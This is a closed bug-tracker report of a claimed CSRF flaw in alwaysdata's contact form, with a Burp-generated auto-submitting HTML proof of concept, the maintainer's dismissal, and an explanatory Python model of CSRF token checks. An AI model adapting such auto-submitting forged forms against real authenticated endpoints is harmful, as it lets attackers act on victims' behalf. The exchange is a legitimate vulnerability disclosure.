Status: Closed
Assigned To: cbay - Private
Attached to Project: Security vulnerabilities
Opened by waloodi_109 - 04.09.2025
Last edited by cbay - 04.09.2025
FS#208 - CSRF in Contact us
Hello Team,
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
CSRF HTML Code:
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
  <form action="https://www.alwaysdata.com/en/contact/" method="POST">
    <input type="hidden" name="address" value="************" />
    <input type="hidden" name="name" value="janam" />
    <input type="hidden" name="number" value="**************" />
    <input type="hidden" name="slot" value="" />
    <input type="hidden" name="message" value="hello" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
  </script>
</body>
There is a csrfmiddleware, but when I removed it and sent the request to an authenticated user, it still worked and submitted the request.
Thank You,
Waleed Anwar
Hello,
The contact form is unauthenticated anyway, so you would gain nothing from forcing someone else to submit it for you.
Kind regards,
Cyril
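As an added illustration of the reply above (example code, not from the report or from alwaysdata), a small Python model of why a missing CSRF token only matters when the action relies on the victim's ambient credentials: a constructed session store, a Django-style double-submit check, an unauthenticated contact handler like the one in the PoC, and an authenticated "change email" handler for contrast.

```python
import hmac
from dataclasses import dataclass, field

@dataclass
class Request:
    """Constructed stand-in for an HTTP POST: cookies the browser attaches
    automatically (ambient credentials), the submitted form fields, and the
    Origin header (a cross-site form post carries the attacker's origin)."""
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    origin: str = ""

SITE_ORIGIN = "https://www.alwaysdata.com"          # from the PoC's form action
SESSIONS = {"s3ss10n-victim": "victim@example.org"}  # constructed session store
ACCOUNT_EMAIL = {"victim@example.org": "victim@example.org"}

def csrf_ok(req: Request) -> bool:
    """Double-submit check in the style of Django's CsrfViewMiddleware: the
    csrfmiddlewaretoken form field must equal the csrftoken cookie (which a
    cross-site page cannot read) and the Origin must be our own site."""
    cookie_tok = req.cookies.get("csrftoken", "")
    form_tok = req.form.get("csrfmiddlewaretoken", "")
    if not cookie_tok or not hmac.compare_digest(cookie_tok, form_tok):
        return False
    return req.origin == SITE_ORIGIN

def handle_contact(req: Request) -> dict:
    """Contact form: no session is consulted, so the stored record contains
    only what the submitter typed. A forged cross-site post produces exactly
    the record the attacker could have sent directly, so CSRF gains nothing."""
    return {"name": req.form.get("name"), "message": req.form.get("message")}

def handle_change_email(req: Request) -> str:
    """State change that acts on the session owner. A forged post would ride
    on the victim's sessionid cookie, so here the CSRF check is essential."""
    user = SESSIONS.get(req.cookies.get("sessionid", ""))
    if user is None:
        return "rejected: not logged in"
    if not csrf_ok(req):
        return "rejected: CSRF check failed"
    ACCOUNT_EMAIL[user] = req.form["email"]
    return f"changed: {user} -> {req.form['email']}"
```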